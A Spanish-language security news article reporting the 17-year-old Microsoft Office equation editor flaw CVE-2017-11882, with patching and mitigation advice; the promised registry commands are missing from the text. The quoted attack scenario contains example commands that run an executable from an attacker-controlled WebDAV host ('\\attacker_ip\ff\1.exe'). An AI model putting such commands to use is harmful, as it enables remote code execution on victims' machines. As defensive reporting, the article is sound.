Un error de MS Office con 17 años de antigüedad permite a los piratas informáticos instalar malware sin interacción del usuario

Deben tener mucho cuidado al abrir archivos en MS Office.

Cuando el mundo todavía está lidiando con la amenaza de la función DDE incorporada de Microsoft Office ‘sin parches’, los investigadores han descubierto un problema grave con otro componente de Office que podría permitir a los atacantes instalar malware de forma remota en computadoras específicas.

La vulnerabilidad es un problema de corrupción de memoria que reside en todas las versiones de Microsoft Office publicadas en los últimos 17 años, incluido Microsoft Office 365, y funciona en todas las versiones del sistema operativo Windows, incluida la última actualización de Microsoft Windows 10 Creators.

Descubierta por los investigadores de seguridad de Embedi, la vulnerabilidad conduce a la ejecución remota de código, lo que permite que un atacante remoto no autenticado ejecute código malicioso en un sistema de destino sin requerir la interacción del usuario después de abrir un documento malicioso. La vulnerabilidad, identificada como CVE-2017-11882, reside en EQNEDT32.EXE, un componente de MS Office que se encarga de la inserción y edición de ecuaciones (objetos OLE) en los documentos.

LEER  El nuevo botnet de rápido crecimiento amenaza con acabar con Internet

Sin embargo, debido a las operaciones de memoria inadecuadas, el componente no maneja adecuadamente los objetos en la memoria, corrompiendo de tal manera que el atacante podría ejecutar código malicioso en el contexto del usuario que inició sesión.

Hace 17 años, EQNEDT32.EXE se introdujo en Microsoft Office 2000 y se mantuvo en todas las versiones publicadas después de Microsoft Office 2007 para garantizar que el software siga siendo compatible con los documentos de versiones anteriores.

DEMO: Explotación permite que el sistema completo se haga cargo

La explotación de esta vulnerabilidad requiere abrir un archivo malicioso especialmente diseñado con una versión afectada del software Microsoft Office o Microsoft WordPad.

Esta vulnerabilidad podría aprovecharse para tomar el control completo de un sistema cuando se combina con los exploits de escalamiento de privilegios del Kernel de Windows (como CVE-2017-11847).

Posible escenario de ataque:

Mientras explicaban el alcance de la vulnerabilidad, los investigadores de Embedi sugirieron varios escenarios de ataque enumerados a continuación:

“Al insertar varios OLE que explotaron la vulnerabilidad descrita, fue posible ejecutar una secuencia arbitraria de comandos (por ejemplo, para descargar un archivo arbitrario de Internet y ejecutarlo)”.

“Una de las formas más fáciles de ejecutar código arbitrario es ejecutar un archivo ejecutable desde el servidor WebDAV controlado por un atacante”. “Sin embargo, un atacante puede usar la vulnerabilidad descrita para ejecutar los comandos como cmd.exe /c start\\atacante_ip\ff. Dicho comando se puede usar como parte de un exploit y activa el inicio de WebClient”.

“Después de eso, un atacante puede iniciar un archivo ejecutable desde el servidor WebDAV utilizando el comando \\attacker_ip\ff\1.exe. El mecanismo de inicio de un archivo ejecutable es similar al servicio \\live.sysinternals.com\tools”.

LEER  AngelFire: El malware de la CIA infecta el sector de arranque del sistema para hackear las PC de Windows

Protección contra la vulnerabilidad de Microsoft Office

Con el lanzamiento de este mes, Microsoft ha solucionado esta vulnerabilidad cambiando la forma en que el software afectado maneja los objetos en la memoria.

Por lo tanto, se recomienda encarecidamente a los usuarios aplicar los parches de seguridad de noviembre lo antes posible para evitar que cibercriminales tomen el control de sus computadoras.

Dado que este componente tiene una serie de problemas de seguridad que se pueden explotar fácilmente, deshabilitarlo podría ser la mejor manera de garantizar la seguridad de su sistema.

Los usuarios pueden ejecutar el siguiente comando en el símbolo del sistema para deshabilitar el registro del componente en el registro de Windows:

Para el paquete de 32 bits de Microsoft Office en el sistema operativo x64, ejecute el siguiente comando:
Además de esto, los usuarios también deben habilitar la Vista protegida (entorno limitado de Microsoft Office) para evitar la ejecución de contenido activo (OLE/ActiveX/Macro).

0 comments on “Un error de MS Office con 17 años de antigüedad permite a los piratas informáticos instalar malware sin interacción del usuarioAdd yours →

Deja un comentario